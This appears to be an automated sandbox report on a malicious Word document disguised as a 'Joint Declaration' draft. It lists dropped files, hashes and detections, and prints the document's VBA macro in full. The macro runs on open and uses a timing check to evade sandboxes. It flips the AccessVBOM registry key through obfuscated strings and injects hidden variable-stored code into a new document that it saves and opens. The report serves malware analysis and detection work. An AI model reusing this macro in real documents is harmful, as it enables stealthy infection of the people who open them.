                        Preview:6.3.6.4.3.3.4.,.7.7.8.7.0.2.2.2.4.,.1.0.3.4.5.0.2.0.,.3.7.4.6.3.7.6.,.1.0.6.9.5.5.3.,.1.5.6.1.9.5.8.,.3.7.4.6.3.7.2.,.2.6.0.1.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.5.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.3.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.5.,.1.2.2.3.4.3.4.,.7.7.8.7.0.2.2.3.4.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.;.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.6.5.4.0.2.1.5.,.2.3.7.1.6.5.1.,.1.6.5.7.4.5.2.,.1.6.5.7.4.5.3.,.3.0.1.2.3.4.6.6.,.3.0.1.5.3.7.2.1.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.1.0.6.9.5.3.3.,.1.0.3.4.5.0.2.1.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.7.0.4.1.0.8.,.3.2.9.4.5.8.8.0.3.,.1.5.6.1.9.5.6.,.1.0.2.3.6.3.8.,.2.4.5.2.3.8.7.,.1.0.0.9.,.5.6.4.1.6.8.7.,.7.7.8.7.0.2.2.2.7.,.8.9.8.9.8.9.8.9.8.,.3.1.9.0.0.0.0.0.,.3.2.0.5.9.2.7.6.7.,.2.4.5.2.3.8.8.,.2.1.0.0.9.4.0.,.3.1.4.1.5.9.0.0.,.

                        C:\Users\user\AppData\Local\Temp\DF041448.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1908
                        Entropy (8bit):2.697596521086675
                        Encrypted:false
                        SSDEEP:48:m8/WKGjoLsidpeXy4McM+/kE5Ko5ARgpOiIgkyTzN:bQidmHbkGoRKt
                        MD5:84A61ED115B36B2E1BC0AACA8528F900
                        SHA1:C2CD2D1497C1A9EBB77BA0AA1B775615C6398034
                        SHA-256:03996C1827D46354E7E9F68CAA069F61C859E50D715951D95A40E0408D4A3BFE
                        SHA-512:1CC55E58A18111AD9E9B2AEE93A06AE6F6D7C3B120FED142B157EA08BF27B5E9A20A39EC5B8927C0C375162995BE3C0522C8FBD7B15167E130F60E1C20100343
                        Malicious:false
                        Reputation:low
                        Preview:1.0.7.,.3.7.4.6.3.7.6.,.1.2.3.,.7.7.8.7.0.2.2.2.4.,.6.3.6.4.3.3.4.,.1.4.6.1.9.5.4.,.2.6.0.1.,.1.1.9.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.3.7.4.6.2.5.9.,.1.1.9.6.3.7.8.,.3.7.4.6.3.6.8.,.4.2.1.4.2.1.7.,.3.7.4.6.3.6.9.,.6.3.6.4.3.3.1.,.1.2.5.,.1.5.6.1.9.5.5.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.3.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.5.,.7.7.8.7.0.2.2.3.4.,.1.2.2.3.4.3.4.,.5.2.1.6.4.2.,.1.2.2.0.7.7.9.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.1.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.4.,.6.5.4.2.1.8.5.1.,.1.2.6.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.6.3.3.0.9.4.1.,.6.7.0.4.1.0.9.,.;.1.0.3.4.5.0.2.0.,.3.,.1.0.6.9.5.5.3.,.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.6.5.4.0.2.1.5.,.1.2.7.,.1.6.5.7.4.5.2.,.7.4.5.3.4.5.9.,.2.3.7.1.6.5.1.,.1.6.5.7.4.5.3.,.3.0.1.2.3.4.6.6.,.3.1.4.1.5.9.1.5.,.3.0.1.5.3.7.2.1.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.1.0.3.4.5.0.2.1.,.1.0.6.9.5.3.3.,.3.4.4.

                        C:\Users\user\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:true
                        Reputation:low
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

                        C:\Users\user\AppData\Local\Temp\mso4262.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:GIF image data, version 89a, 15 x 15
                        Category:dropped
                        Size (bytes):663
                        Entropy (8bit):5.949125862393289
                        Encrypted:false
                        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                        C:\Users\user\AppData\Local\Temp\prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1127211
                        Entropy (8bit):5.812814119457844
                        Encrypted:false
                        SSDEEP:24576:y/T48adNSu65QT+wkOA21Pa601IURbx6uhdYwjERkwhgizvU72DV:yb486Su6rwkOA21Pa601IYx6UEGiFh
                        MD5:5F6A325EFF287D11AEB18114C9D7E973
                        SHA1:69B8465D2678615742794C507F69DB28A462D7FD
                        SHA-256:1605D2FF3197A3864FA48301EBD5420AD41010F6015483F4290097ED1B586B27
                        SHA-512:DD3D77AD27771DD71710DBB703C60C9E8BA62193620B44E0A30CB91DD24AF7D54B871300EC6BCC6150B9D2C4F6C4434E4B17C0AAA8CA9EEEFD8C485B487F7A90
                        Malicious:false
                        Preview:RNWPREP.....J.L[.X......2....... ..W.h.G.?'kr..1Z...##.......b........f...[ d..w.w.2...........,T.0..`......L`.....,T.%..`......5L`......TSb........^*........c....^*.......@...D..RbR.......Whe.`v'...D..Rb........MM..`......Rb........Lle.`."....Rb...P....s4..`......Rb".iS....el..`L.....Rb".......vue.`"!...D..Rb..sS....es..`B....D....`......Rb6.......oNe.`.%....Rb>.2.....Pse.`R.....RbB.......Nz..`.....D..RbV.i.....Xxe.`.&...D..Rb^.......Kt..`<....D..Rbv.}.....MUe.`B.....Rbv......PW..`......Rbz..O....Eae.``.....Rb..n.....I0e.`......Rb........JAe.`.....D..Rbv.......Uee.`......Rbz..G....gue.`. ....Rb..1 ....ue..`n.....Rb........FAe.`......Rb..@X....X1e.`b"....Rbz.\.....Zo..`.#...D..Rb........S5..`Z.....Rb........Ch..`J....D..Rb........xv..`D.....Rb.......O_..`......Rb..|.....Fie.``.....Rb..[p....Ql..`......Rb..Y?....g6..`......Rb........ETe.`......Rb..F=....Xce.`. ...D..Rb.......ZA..`~$...D..Rb...^....Yk..`......Rb.@.....dse.`......Rb.w.....UIe.`......Rb..S]....aN..`.....D..Rb..M....

                        C:\Users\user\AppData\Local\Temp\~$v5_ Joint Declaration C5 GER_track changes.doc.doc

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.912478106217372
                        Encrypted:false
                        SSDEEP:3:EIXl+PWlllw/7lEUl6vlKN3XfAn8B14xKn:lzl/w/PXpn
                        MD5:388BCC0C7DFDCD7C93D94D8D66FF7E77
                        SHA1:50AE43A49A9CFFAE317DB76776375EF0B6643AB0
                        SHA-256:E02F6A704E4AF780B3EFBB45C165D962FF1268EDCAC58E427133DBECB64991AD
                        SHA-512:B8BA0097118DD1D6887019C3F726493A920CDBAAC48885820D319ABAB77900634CA13C1082857710A0FC7967F979CF09EF5B3333AF476304AC1F743683A71EA1
                        Malicious:false
                        Preview:.user..................................................G.a.n.j.i.....`..Z$...@;//w...@;//w....W.......................W.........r.e...h.3....&M.r.e..........6...

                        C:\Users\user\AppData\Local\Temp\~WRD0000.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:false
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

                        C:\Users\user\AppData\Local\Temp\~WRD0001.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):27365
                        Entropy (8bit):7.695762935056973
                        Encrypted:false
                        SSDEEP:384:/iYDtx5ldxurohRPdPhn6OxH1++Nxt/ZtNNj139fTaK4D+nfS7iM9Q4kvaQxTUpi:/Nx5lmr0NhnxHoUxllNj1NX4D6Sz92SA
                        MD5:7F6DCEB8F8F61A5E1A0AF4DDA8009BCC
                        SHA1:96EDEA1E542C910AD97A5A330BE83CAF3EE6829C
                        SHA-256:D3DCF44DA5B295EAF01919536DA29FFAC68B8FC7735B85DABA1144B94FF142E3
                        SHA-512:A58807C2CC8BBA61A20463CD9AE21EC86B247D8206609BB0FE260FBE74F08D9C96A90D811B8ACCE023AA23113B0B6EF0801E55488A1BD9CE2554AA841651A159
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

                        C:\Users\user\AppData\Local\Temp\~WRL0002.tmp (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:false
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

                        C:\Users\user\Desktop\Rev5_ Joint Declaration C5 GER_track changes.doc (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):56659
                        Entropy (8bit):7.8358614564190425
                        Encrypted:false
                        SSDEEP:768:Dtn0S1ew5SXju6CvNxyhaWqx/hIyGBPCq7PSiwsIH762oDWDLmPbyLZymm11zpcx:DV0vwAX/CvaYWMiySPSPHNDSOFyBi
                        MD5:450C854353108E15BD86C6A447454200
                        SHA1:77256F019E37A589BE7DADEDEF1996D9F260CE12
                        SHA-256:2CE4DCEB4CB15F5673864A0D93AF6BC608004E305D37610E92BEB7F94916DE23
                        SHA-512:432CE44C8C679933ACBE57375C23E50EBE2417778D52506A819FB29BADD857308A09DB79C543333284F829AE1E8E6200EF35627533420B1C751AA2C611596534
                        Malicious:true
                        Preview:PK..........!...=.....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K..0.F.H...[....!.t.. ....$..}........s....&P.....|.vb{}.h...!jgKvU.X.V:..d_.?.oY.QX%.g.dG..z......!fTmc.v....Q...X8..Zj..@z.[..!.._.Vo.t..b.-.m.7P.}...#..T..}..*...R 5.U....k-.8T.... ..ga..8C{.....Uv}.N...:.Hh[N..u.i..V......^.....{C..y.0..J....ZQ5@.B...d.M.@..aC.9..Gt.i.F0..>^-H.m.....6A[...0...... ..{qz...I..p.)&..D.c.......x@.....yV.../.,~....u.b5&...X..a$.*HgZB....X..7.mW.T..J.U.!......p....D.^..$.....

                        C:\Users\user\Desktop\~$v5_ Joint Declaration C5 GER_track changes.doc

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.9078183068213024
                        Encrypted:false
                        SSDEEP:3:EIXl+PWlllmsl7ldlKtnlcX9AellSxKn:lzl/XldlK0Nx//n
                        MD5:FEEC8DEA0F7C4686BF4430B2864818E4
                        SHA1:1179FA7F95F64A56C9657C3D5FFD2354CDC32F2C
                        SHA-256:3413D85FEB733A3287B67CEF60A7A6D33F665451C518697BD5259223B785A031
                        SHA-512:AEC6BB71A5696FCC7737913B1F5CE2A63DC3C29262BC89E6BDDDC864FEC438FD1CDEB30CAACA54E344F46D936B217BA540B38D8B50427B20C33E4D4914EE801B
                        Malicious:false
                        Preview:.user..................................................G.a.n.j.i.....`........<.......<........................................Hb.e..P....P...f.d.e..........6...

                        C:\Users\user\Desktop\~WRD0000.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):56659
                        Entropy (8bit):7.8358614564190425
                        Encrypted:false
                        SSDEEP:768:Dtn0S1ew5SXju6CvNxyhaWqx/hIyGBPCq7PSiwsIH762oDWDLmPbyLZymm11zpcx:DV0vwAX/CvaYWMiySPSPHNDSOFyBi
                        MD5:450C854353108E15BD86C6A447454200
                        SHA1:77256F019E37A589BE7DADEDEF1996D9F260CE12
                        SHA-256:2CE4DCEB4CB15F5673864A0D93AF6BC608004E305D37610E92BEB7F94916DE23
                        SHA-512:432CE44C8C679933ACBE57375C23E50EBE2417778D52506A819FB29BADD857308A09DB79C543333284F829AE1E8E6200EF35627533420B1C751AA2C611596534
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:PK..........!...=.....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K..0.F.H...[....!.t.. ....$..}........s....&P.....|.vb{}.h...!jgKvU.X.V:..d_.?.oY.QX%.g.dG..z......!fTmc.v....Q...X8..Zj..@z.[..!.._.Vo.t..b.-.m.7P.}...#..T..}..*...R 5.U....k-.8T.... ..ga..8C{.....Uv}.N...:.Hh[N..u.i..V......^.....{C..y.0..J....ZQ5@.B...d.M.@..aC.9..Gt.i.F0..>^-H.m.....6A[...0...... ..{qz...I..p.)&..D.c.......x@.....yV.../.,~....u.b5&...X..a$.*HgZB....X..7.mW.T..J.U.!......p....D.^..$.....

                        C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0

                        Static File Info

                        General

                        File type:Microsoft Word 2007+
                        Entropy (8bit):7.9707357623815644
                        TrID:
                        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
                        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
                        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
                        • ZIP compressed archive (8000/1) 5.84%
                        File name:Rev5_ Joint Declaration C5 GER_track changes.doc
                        File size:56'429 bytes
                        MD5:a15e652cf058209c0c0040dfcaf86fec
                        SHA1:0f162082585615212dd8a3fce41944a9a04c5a21
                        SHA256:47092548660d5200ea368aacbfe03435c88b6674b0975bb87a124736052bd7c3
                        SHA512:07324f0765679c73c2cb18774356bbc9baa7d2a1b045332081e54604692e08e93219b4b743e081810cdd1630ddcf35473749f4f6b8ad971a460212f23d8b3980
                        SSDEEP:1536:S/qgy7rV76z1EsSzQMXnkM8QvYIStgpAt4kD6g:bhyAQMXkM7nEgpAt4kDj
                        TLSH:1743F12AD6B76CF0D81F4FB30E532E08F62A86B1DB592282219471DCD4C19F16D5F49E
                        File Content Preview:PK.........x-Y..=.....].......[Content_Types].xml...n.0.E.......D'..(,g..@6m..@..9.....c'......&1.8....9...H./.L.. D.l......J..]......#."..D.,.l..]...[..=...m,.....<.......RK...H.a........b..Kg.,..2.jy...6.]?...I.-.>........-.R3.YU.......]%n..............

                        File Icon

                        Icon Hash:35e1cc889a8a8599

                        Static OLE Info

                        General

                        Document Type:OpenXML
                        Number of OLE Files:1

                        OLE File "Rev5_ Joint Declaration C5 GER_track changes.doc"

                        Indicators
                        Has Summary Info:
                        Application Name:
                        Encrypted Document:False
                        Contains Word Document Stream:True
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Summary
                        Title:
                        Author:
                        Template:Normal.dotm
                        Last Saved By:
                        Revion Number:1
                        Total Edit Time:0
                        Create Time:2024-09-13T09:10:00Z
                        Last Saved Time:2024-09-13T09:15:00Z
                        Number of Pages:4
                        Number of Words:1662
                        Number of Characters:9477
                        Creating Application:Microsoft Office Word
                        Security:12
                        Document Summary
                        Number of Lines:78
                        Number of Paragraphs:22
                        Thumbnail Scaling Desired:false
                        Company:
                        Contains Dirty Links:false
                        Shared Document:false
                        Changed Hyperlinks:false
                        Application Version:16.0000

                        Streams with VBA

                        VBA File Name: ThisDocument.cls, Stream Size: 5829
                        General
                        Stream Path:VBA/ThisDocument
                        VBA File Name:ThisDocument.cls
                        Stream Size:5829
                        Data ASCII:. . . . . . . . . l . . . . . . b . . . . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . U e M y } u . * J . L _ \\ a . i . . . . . . . . . . . . . . . . . . . . N : W . : D D . : y W 4 . . . . . . . . . . . . . . . . . . . . . . x . . . . N : W . : D D . : y W 4 a . U e M y . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . .
                        Data Raw:01 16 03 00 06 00 01 00 00 6c 0a 00 00 e4 00 00 00 62 02 00 00 84 0b 00 00 92 0b 00 00 56 12 00 00 03 00 00 00 01 00 00 00 f9 85 91 97 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 ad eb 61 83 09 55 65 4d be ac 99 79 f7 b7 e7 de 7d 75 99 07 2a 4a 15 4c 90 5f 5c 61 be 1a b0 69 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
        danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
        Set doc2 = objApp.Documents.Open(namedoc)
    doc2.Save
    doc2.Close
End Function
Sub verydanger()
        strng = "WSc" & "ript.She"
        strng = strng & "ll"
        Set wsl = CreateObject(strng)
        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
    On Error Resume Next
        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                ActiveDocument.Shapes(i).Delete
        Next i
    ActiveDocument.Save
        sss = Now()
    While Now < sss + TimeValue("00:00:20")
        DoEvents
    Wend
        If Now() - sss < TimeValue("00:00:15") Then Exit Sub
        verydanger
    Set objApp = CreateObject("Word.Application")
    objApp.Visible = False
    Set doc = objApp.Documents.Add
    For Each vars In ActiveDocument.Variables
    doc.Variables.Add vars.Name & "ergegdr", vars
    i = i + 1
    Next
    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
    doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
    doc.Close
        rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
        objApp.Quit False
End Sub

                        Streams

                        Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 438
                        General
                        Stream Path:PROJECT
                        CLSID:
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:438
                        Entropy:5.156275738049758
                        Base64 Encoded:True
                        Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 2 9 B 6 2 B 3 F 2 F 3 F 2 F 3 A 3 4 3 A 3 4 " . . D P B = " 0 A 0 8 A 6 3 1 3 6 4 E 3 6 4 E C 9 B 2 3 7 4 E E 8 8 C 4 B 4 6 8 E A 9 4 7 D B E 7 C 5 D C 7 E 2 F 1 A 9 5 6 5 D
                        Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                        Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                        General
                        Stream Path:PROJECTwm
                        CLSID:
                        File Type:data
                        Stream Size:41
                        Entropy:3.0773844850752607
                        Base64 Encoded:False
                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3247
                        General
                        Stream Path:VBA/_VBA_PROJECT
                        CLSID:
                        File Type:data
                        Stream Size:3247
                        Entropy:4.532403418826159
                        Base64 Encoded:False
                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                        Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3529
                        General
